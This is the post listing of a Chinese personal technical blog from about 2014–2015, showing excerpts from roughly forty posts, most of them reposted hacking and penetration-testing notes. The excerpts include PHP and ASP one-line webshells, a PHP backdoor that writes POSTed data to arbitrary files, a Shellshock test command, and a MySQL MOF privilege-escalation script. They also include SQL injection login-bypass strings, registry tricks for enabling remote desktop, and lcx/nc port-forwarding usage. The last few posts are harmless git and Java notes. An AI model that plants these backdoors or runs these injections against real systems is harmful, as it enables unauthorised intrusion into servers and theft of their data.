自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(40)
  • 收藏
  • 关注

转载 lcx.exe转发原理及其教程

2010-07-18 03:59网络环境:(1)主机A可以随意连接外网(2)主机B在外网无法连接未经防火墙许可的端口(例如 3389端口)原理:(1)内网主机A主动连接外网主机B的80端口(2)主机B的80端口接受的数据转到5630端口(3)从5630端口输入的数据也可以转到80端口(4)从80端口输入的数据传到主机A

2015-02-03 21:02:44 4540

转载 Shellshock漏洞回顾与分析测试

0x00 漏洞概述很多人或许对2014上半年发生的安全问题“心脏流血”(Heartbleed Bug)事件记忆颇深,2014年9月,又出现了另外一个“毁灭级”的漏洞——Bash软件安全漏洞。这个漏洞由法国GNU/Linux爱好者Stéphane Chazelas所发现。随后,美国电脑应急响应中心(US-CERT)、红帽以及多家从事安全的公司于周三(北京时间2014年9月24日)发出警告

2014-12-25 16:37:54 1469

转载 检测cgi-bin漏洞存在方法

bash漏洞技术层面分析漏洞起源:漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test",如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出:v

2014-12-25 16:36:12 20715

转载 mof提权带回显带清楚命令版本.php

php$path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setc

2014-12-17 16:33:00 678

转载 MYSQL提权总结

一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:方法 1

2014-12-17 16:29:11 574

翻译 ashx上传绕过

在上传类型添加ashx类,上传一个ashx文件,a.ashx,代码如下: using System; using System.Web; using System.IO; publicclass Handler : IHttpHandler {public void ProcessRequest (HttpContext context) {context.Response.ContentT

2014-12-17 14:51:41 1472

转载 一句话

ASP、ASPX、PHP原生态无污染一句话;;稍微改造的一句话:ASP:123456Function MorfiCode(Code)    MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)EndFuncti

2014-12-15 16:03:36 933

转载 php一句话后门分析

1.eval eval用法: eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 <?php eval ($_POST[jusker]); ?>2.assert Assert用法:

2014-12-05 08:51:47 1412

转载 Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结

1、java应用服务器    Java应用服务器主要为应用程序提供运行环境,为组件提供服务。Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器。1.1  常见的Server概述    常见的Java服务器:Tomcat、Weblogic、JBoss、GlassFish、Jetty、Resin、IBM Websphere、Bejy Tiger、Gero

2014-11-17 15:42:02 5677

转载 Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!

0x00 背景最近大家都在玩Struts2的class.classLoader.官方在S-20的两漏洞,一个commons-fileupload造成的DoS,这个就是让cpu慢点,不打补丁觉得也无所谓.另外一个,就是class.classLoader允许对象赋值.看到大家总是在tomcat8上寻求利用,觉得很鸡肋(用户的应用更换Tomcat真没那么快),版本限制就是软肋.顿时,

2014-11-17 14:27:47 884

转载 攻击JavaWeb应用[2]-CS交互安全

注:本节意在让大家了解客户端和服务器端的一个交互的过程,我个人不喜欢xss,对xss知之甚少所以只能简要的讲解下。这一节主要包含HttpServletRequest、HttpServletResponse、session、cookie、HttpOnly和xss,文章是年前几天写的本应该是有续集的但年后就没什么时间去接着续写了。由于工作并非安全行业,所以写的并不算专业希望大家能够理解。后面的章节可能

2014-11-14 15:29:01 1028

转载 攻击JavaWeb应用[4]-SQL注入[2]

注:这一节主要是介绍Oracle和SQL注入工具相关,本应该是和前面的Mysql一起但是由于章节过长了没法看,所以就分开了。0x00 OracleOracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。Oracle对于MYSQL、MSSQL来说意味着更大的数据量,更大的权限。这一次我们依旧使用上面的

2014-11-14 15:26:59 1321

转载 攻击JavaWeb应用[3]-SQL注入[1]

注:本节重点在于让大家熟悉各种SQL注入在JAVA当中的表现,本想带点ORM框架实例,但是与其几乎无意,最近在学习MongoDb,挺有意思的,后面有机会给大家补充相关。0x00 JDBC和ORMJDBC:JDBC(Java Data Base Connectivity,java数据库连接)是一种用于执行SQL语句的Java API,可以为多种关系数据库提供统一访问。

2014-11-14 15:26:05 1811

转载 攻击JavaWeb应用[6]-程序架构与代码审计

注:不管多么强大的系统总会有那么些安全问题,影响小的可能仅仅只会影响用户体验,危害性大点的可能会让攻击者获取到服务器权限。这一节重点是怎样去找到并利用问题去获取一些有意思的东西。Before:有MM的地方就有江湖,有程序的地方就有漏洞。现在已经不是SQL注入漫天的年代了,Java的一些优秀的开源框架让其项目坚固了不少。在一个中大型的Web应用漏洞的似乎永远都存在,只是在于影

2014-11-14 15:24:50 1974

转载 攻击JavaWeb应用[8]-后门篇

0x00 背景关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享几种比较有意思的JavaWeb后门给大家玩。0x01 jspx后门在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat的配置文件的时候看到jsp和jspx都是由org.

2014-11-14 15:21:02 3248

转载 攻击JavaWeb应用[9]-Server篇[2]

0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当Web服务器接收到一个HTTP请求(request),会返回一个HTTP响应(response),例如送回一个HTML页面。Server篇其实还缺少了JBOSS和Jetty,本打算放到Server[2]写的。但是这次重点在于和大家分享B/S实现和交互技术。Server[1]已经给大家介绍了许多由J

2014-11-14 15:19:19 688

转载 攻击JavaWeb应用[7]-Server篇[1]

java应用服务器Java应用服务器主要为应用程序提供运行环境,为组件提供服务。Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器。常见的Server概述常见的Java服务器:Tomcat、Weblogic、JBoss、GlassFish、Jetty、Resin、IBM Websphere、Bejy Tiger、Geronimo、Jo

2014-11-14 15:11:17 1974

转载 又一款超强PHP后门

$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"];$c = $_POST["z2"];$buf = "";for ($i = 0; $i strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));@fwrite(fopen($f, "w") , $buf);

2014-11-14 15:10:02 733

转载 渗透中寻找突破口的那些事

0x00 寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种漏洞是最好的,没有的话一般就要暴破子域名了我常用的软件为dnsmap,基本用法./dnsmap ta

2014-11-14 11:42:38 836

转载 编辑器漏洞手册

简介#2014年8月21日最初的手册版本,是由北洋贱队的各位朋友收集整理。时隔4年,我们再次整理了这些文件。目的是希望这种传统能延续下去。我们相信:星星之火可以燎原。希望大家能多提建议,完善这份手册。#2010年某月某日创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群

2014-09-09 15:07:11 1532

转载 搜索型注入

如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是

2014-08-21 14:38:55 377

转载 渗透笔记

【SQL语句直接开启3389】3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections其中键值DenyTSConnections直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可

2014-08-19 11:14:44 1664

原创 DOS命令

查看版本:ver查看权限:whoami查看配置:systeminfo查看用户:net user查看进程:tasklist查看正在运行的服务:tasklist /svc查看开放的所有端口:netstat -ano查询管理用户名:query user查看搭建环境:ftp 127.0.0.1查看指定服务的路径:sc qc Mysql添加一个用户:net user

2014-08-19 11:13:30 323

原创 【web提权笔记】

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/cc:\windows\temp\cookies\net1.exe user。2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上

2014-08-19 11:12:29 469

转载 通过 HTTP 头进行 SQL 注入

在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊的输入向量GET和POST变量。那么对于其他的HTTP头部参数呢?难道他们不是潜在的SQ

2014-08-14 12:53:37 719

原创 SQLMAP使用笔记

注入 分法不同,种类不同,先简单的分下类:1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”获取数据库sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs得到库名后获取表sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 --tables获取字

2014-08-14 12:43:15 392

原创 新型mysql报错注入

新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出:1.查询数据库版本:select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version

2014-08-12 15:56:23 1214

转载 NC参数介绍

参数介绍:'nc.exe -h'即可看到各参数的使用方法。基本格式:nc [-options] hostname port[s] [ports] ...nc -l -p port [options] [hostname] [port]-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point

2014-08-11 17:43:17 2004

转载 使用LCX进行内网端口转发

局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。Lcx.exe是一个端口转发工具,相当于ba

2014-08-11 16:47:23 10677

转载 绕过WAF防火墙继续SQL注入常用方法

绕过WAF防火墙继续SQWeb Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过。WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是啥。    WAF呢,简单说,它是一个Web应用程序防火墙,其功能呢是用于过滤某些恶意请求与某些关键字。WAF仅仅是一个工具,帮助你防护网站来的。但是

2014-06-23 09:17:32 2832

原创 万能”的网站后台账号和密码!

虽说是万能,但是也不是全部网站都奏效,把账号和密码按照相同的代码输入进去即可。1:“or “a“=“a2: ‘)or(‘a‘=‘a3:or 1=1--4:‘or 1=1--5:a‘or‘ 1=1--6:“or 1=1--7:‘or‘a‘=‘a8:“or“=“a‘=‘a9:‘or‘‘=‘10:‘or‘=‘or‘11: 1 or ‘1‘=‘1‘=11

2014-06-11 14:34:16 7628

转载 find命令详解

功能:在目录结构中搜索文件,并执行指定的操作。此命令提供了相当多的查找条件,功能很强大。 语法:find 起始目录 寻找条件 操作 说明:find命令从指定的起始目录开始,递归地搜索其各个子目录,查找满足寻找条件的文件并对之采取相关的操作。   该命令提供的寻找条件可以是一个用逻辑运算符not、and、or组成的复合条件。逻辑运算符and、or、not的含义为:   (1)

2014-06-04 11:26:20 529

原创 JAVA正则表达式代码

常用的正则表达式:size=12px]1。^\d+$  //匹配非负整数(正整数 + 0) 2。^[0-9]*[1-9][0-9]*$  //匹配正整数 3。^((-\d+)|(0+))$  //匹配非正整数(负整数 + 0) 4。^-[0-9]*[1-9][0-9]*$  //匹配负整数 5。^-?\d+$    //匹配整数 6。^\d+(\.\d+)?$  //匹配非负浮点数(正

2014-05-09 14:06:32 390

转载 git基础学习(四):工作区和暂存区

Git和其他版本控制系统如SVN的一个不同之处就是有暂存区的概念。先来看名词解释。工作区(Working Directory):就是你在电脑里能看到的目录,比如我的learngit文件夹就是一个工作区:版本库(Repository):工作区有一个隐藏目录“.git”,这个不算工作区,而是Git的版本库。Git的版本库里存了很多东西,其中最重要的就是称为sta

2014-04-30 13:10:10 599

转载 git基础学习(三):版本回退 git reset --hard HEAD^(或者是commit id的前几位)和git reflog

现在,你已经学会了修改文件,然后把修改提交到Git版本库,现在,再练习一次,修改readme.txt文件如下:Git is a distributed version control system.Git is free software distributed under the GPL.然后尝试提交:$ git add readme.txt$ git commit -m

2014-04-30 11:51:22 24957 2

原创 git基础学习(二):对修改的文件进行提交 git diff 和 git status

我们已经成功地添加并提交了一个readme.txt文件,现在,是时候继续工作了,于是,我们继续修改readme.txt文件,改成如下内容:Git is a distributed version control system.Git is free software.现在,运行git status命令看看结果:$ git status# On branch master#

2014-04-30 11:20:28 2133

原创 git基础学习(一):创建仓库,add和commit

1.安装完成后,还需要最后一步设置,在命令行输入:$ git config --global user.name "Your Name"$ git config --global user.email "email@example.com"2.

2014-04-30 11:10:06 757 1

转载 git教程(关于git的学习笔记选取自廖雪峰)

可以参考廖雪峰的git教程

2014-04-30 10:24:10 719

原创 java文件上传

public String buildFile(File templet) throws IOException {String suffix = getUploadPathFileName();String urlPathString=ServletActionContext.getServletContext().getRealPath("/") +"upload";String

2014-04-30 09:33:33 388

原创 java的文件上传

package com.cctv.Util;import java.io.File;import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.text.SimpleDa

2014-04-30 09:21:38 405

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除